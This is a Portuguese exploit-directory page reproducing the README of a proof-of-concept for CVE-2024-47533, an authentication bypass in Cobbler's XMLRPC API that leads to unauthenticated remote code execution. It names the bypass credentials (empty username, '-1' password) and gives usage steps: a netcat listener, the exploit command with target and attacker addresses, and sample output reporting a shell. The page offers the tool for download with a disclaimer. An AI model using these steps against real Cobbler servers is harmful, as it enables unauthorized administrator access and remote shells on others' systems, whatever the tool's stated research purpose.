Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-47533-PoC — Exploit de prova de conceito para CVE-2024-47533, um bypass de autenticação não autenticado na API XMLRPC do Cobbler levando a execução remota de código via shell reverso injetado. | Kitploit
Ferramentas/GitHubGitHub/00xcanelo/cve-2024-47533-poc
Autenticação e AutorizaçãoExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoRed Teaming
GitHub00xcanelo/cve-2024-47533-poc

CVE-2024-47533-PoC

Exploit de prova de conceito para CVE-2024-47533, um bypass de autenticação não autenticado na API XMLRPC do Cobbler levando a execução remota de código via shell reverso injetado.

Ver Repositório
13há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-47533 – Bypass de Autenticação XMLRPC do Cobbler → Reverse Shell (RCE não autenticado)

📌 Resumo

Este repositório contém um exploit de Prova de Conceito (PoC) para CVE-2024-47533,
um bypass crítico de autenticação na API XMLRPC do Cobbler que leva a execução remota de código (RCE) não autenticada.

O exploit explora a falha do método login() da API XMLRPC para contornar a autenticação e injetar um comando reverse shell via background_import().


⚠️ Aviso Legal

Esta ferramenta é destinada apenas para fins educacionais, de pesquisa e testes de penetração autorizados.
NÃO a utilize em sistemas que você não possui ou para os quais não tem permissão explícita por escrito para testar.
O autor não assume nenhuma responsabilidade por uso indevido ou danos.


🛠 Detalhes Técnicos

  • Tipo de Vulnerabilidade: Bypass de Autenticação → RCE
  • Componente Afetado: API XMLRPC do Cobbler
  • Vetor de Ataque: Rede
  • Privilégios Necessários: Nenhum
  • Interação do Usuário: Nenhuma

Causa Raiz:
utils.get_shared_secret() retorna incorretamente -1 devido ao tratamento inadequado de leituras de arquivos em modo binário com uma codificação, permitindo autenticação com um nome de usuário vazio e -1 como senha.

Impacto:
Um atacante pode:

  • Obter acesso à API em nível de administrador
  • Injetar comandos arbitrários do sistema nos templates do Cobbler
  • Iniciar um reverse shell no alvo

🚀 Uso

1️⃣ Clone o repositório

root@kitploit:~
git clone https://github.com/00xCanelo/CVE-2024-47533-PoC.git
cd CVE-2024-47533-PoC

2️⃣ Configure um listener

Na sua máquina atacante:

root@kitploit:~
nc -lvnp 4444

3️⃣ Execute o exploit

root@kitploit:~
python3 CVE-2024-47533.py -u http://<TARGET_IP>:<PORT>/RPC2 -l <LHOST> -p <LPORT>

Exemplo:

root@kitploit:~
python3 CVE-2024-47533.py -u http://192.168.1.50:25151/RPC2 -l 192.168.1.100 -p 4444

📂 Estrutura de Arquivos

root@kitploit:~
.
├── CVE-2024-47533.py  # Script de exploit reverse shell
└── README.md          # Documentação

📸 Exemplo de Saída

root@kitploit:~
[*] Alvo: http://192.168.1.50:25151/RPC2
[*] Listener: 192.168.1.100:4444
[*] Payload: bash
[*] Conectando ao Cobbler...
[*] Autenticando...
[*] Executando exploit...
[+] Exploit enviado! Consegui um Shell 🔥.

🧑‍💻 Autor

00xCanelo
Perfil no GitHub


📚 Referências

  • NVD: CVE-2024-47533
  • GitHub do Projeto Cobbler
Baixar ferramenta